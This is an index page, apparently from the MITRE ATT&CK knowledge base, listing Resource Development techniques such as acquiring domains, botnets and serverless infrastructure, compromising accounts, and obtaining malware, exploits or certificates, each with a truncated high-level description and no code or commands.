Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary …
T1583.001
Resource DevelopmentDomains
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. …
T1583.002
Resource DevelopmentDNS Server
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic …
T1583.003
Resource DevelopmentVirtual Private Server
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual …
T1583.004
Resource DevelopmentServer
Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and …
T1583.005
Resource DevelopmentBotnet
Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems …
T1583.006
Resource DevelopmentWeb Services
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based …
T1583.007
Resource DevelopmentServerless
Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. …
T1583.008
Resource DevelopmentMalvertising
Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position …
T1584
Resource DevelopmentCompromise Infrastructure
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and …
T1584.001
Resource DevelopmentDomains
Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain …
T1584.002
Resource DevelopmentDNS Server
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for …
T1584.003
Resource DevelopmentVirtual Private Server
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell …
T1584.004
Resource DevelopmentServer
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During …
T1584.005
Resource DevelopmentBotnet
Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that …
T1584.006
Resource DevelopmentWeb Services
Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register …
T1584.007
Resource DevelopmentServerless
Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing …
T1584.008
Resource DevelopmentNetwork Devices
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where …
T1585
Resource DevelopmentEstablish Accounts
Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a …
T1585.001
Resource DevelopmentSocial Media Accounts
Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to …
T1585.002
Resource DevelopmentEmail Accounts
Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as …
T1585.003
Resource DevelopmentCloud Accounts
Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud …
T1586
Resource DevelopmentCompromise Accounts
Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be …
T1586.001
Resource DevelopmentSocial Media Accounts
Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be …
T1586.002
Resource DevelopmentEmail Accounts
Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them …
T1586.003
Resource DevelopmentCloud Accounts
Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage …
T1587
Resource DevelopmentDevelop Capabilities
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. …
T1587.001
Resource DevelopmentMalware
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, …
T1587.002
Resource DevelopmentCode Signing Certificates
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to …
T1587.003
Resource DevelopmentDigital Certificates
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, …
T1587.004
Resource DevelopmentExploits
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or …
T1588
Resource DevelopmentObtain Capabilities
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or …
T1588.001
Resource DevelopmentMalware
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 …
T1588.002
Resource DevelopmentTool
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A …
T1588.003
Resource DevelopmentCode Signing Certificates
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts …
T1588.004
Resource DevelopmentDigital Certificates
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the …
T1588.005
Resource DevelopmentExploits
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to …
T1588.006
Resource DevelopmentVulnerabilities
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, …
T1588.007
Resource DevelopmentArtificial Intelligence
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be …
T1608
Resource DevelopmentStage Capabilities
Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take …
T1608.001
Resource DevelopmentUpload Malware
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, …
T1608.002
Resource DevelopmentUpload Tool
Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or …
T1608.003
Resource DevelopmentInstall Digital Certificate
Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications …
T1608.004
Resource DevelopmentDrive-by Target
Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through …
T1608.005
Resource DevelopmentLink Target
Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user …
T1608.006
Resource DevelopmentSEO Poisoning
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users …
T1650
Resource DevelopmentAcquire Access
Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks …